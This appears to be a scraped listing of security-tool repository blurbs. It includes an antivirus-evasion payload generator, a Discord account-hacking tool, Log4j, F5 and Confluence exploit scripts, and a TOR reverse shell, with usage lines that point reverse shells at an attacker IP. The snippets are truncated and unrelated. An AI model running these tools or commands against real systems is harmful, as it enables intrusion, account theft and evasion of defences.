Generator
Evade AV with obfuscated payloads
Installation
must install dotnet
prior to running the script with net45
Running
./generator.py -ip <Your-IP> -port <Your-PORT> -key <XOR key for example 0xff>
Should generate payload.exe
Evade AV with obfuscated payloads
must install dotnet
prior to running the script with net45
./generator.py -ip <Your-IP> -port <Your-PORT> -key <XOR key for example 0xff>
Should generate payload.exe
DISCORD_ACCOUNT_HACKING_TOOL ( EDUCATIONAL PURPOSE ) Hack any account sending fake nitro QR code (only for educational purpose) Start my program token
Log4j2-intranet-scan ⚠️ 免责声明 本项目仅面向合法授权的企业安全建设行为,在使用本项目进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权 如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任 在使用本项目前,请您务
Revealin Uncover the full name of a target on Linkedin. It's just a little PoC exploiting a design flaw. Useful for OSINT. Screenshot Usage $ git clon
webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co
CloudFlare reconnaissance, tries to uncover the IP behind CF.
F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At
log4j-Scanner scanner for log4j cat web-urls.txt | python3 log4j.py ID.burpcollaborator.net web-urls.txt http://127.0.0.1:8080 https://www.google.c
CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22
Malware Arcane Repository of notes and scripts I use when doing malware analysis
Parental Control Application LittleBrother Overview LittleBrother is a simple parental control application monitoring specific processes (read "games"
Easy to setup customizable honeypots for monitoring network traffic, bots activities and username\password credentials. The current available honeypot
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
🚀🚀🚀Program helps you to detect the major framework or technology used in writing any android app. Just provide the apk 😇😇
RedlineSpam Python tool to spam Redline Infostealer panels with legit looking da
InvisibilityCloak Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio proj
RonnieColemanYARAParser This script is named after Ronnie Coleman, and peforms bulk lifts on arbitary file features using YARA console logging. Requir
Hashpic Hashpic creates an image from the MD5 hash of your input. Since v0.2.0 i
Poiana Reverse shell over TOR network using hidden services Features - Create a hidden service - Generate non-staged payload (python/meterpreter_rev
CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V
QHack 2022 Problems from Coding Challenges 2022. Rules and how it works To test